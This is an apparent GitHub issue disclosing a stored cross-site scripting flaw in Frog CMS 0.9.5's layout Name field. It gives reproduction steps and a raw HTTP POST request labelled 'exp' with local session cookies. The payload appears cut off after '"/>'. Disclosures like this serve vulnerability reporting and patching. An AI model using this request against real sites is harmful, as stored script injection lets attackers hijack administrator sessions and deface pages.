Frog CMS simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management.
GNU General Public License v3.0
160
stars
36
forks
source link
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability #8
I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/
publish an article,and you can click it.
layouts-->Edit layout-->Name
payload:"/>
I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/ publish an article,and you can click it. layouts-->Edit layout-->Name payload:"/>
exp POST /test/FrogCMS-master/admin/?/layout/edit/1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/test/FrogCMS-master/admin/?/layout/edit/1 Content-Type: application/x-www-form-urlencoded Content-Length: 113 Cookie: current_tab=:tab-1; expanded_rows=4; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e Connection: keep-alive Upgrade-Insecure-Requests: 1
layout%5Bname%5D="/>
payload:"/>
Affected Version: 0.9.5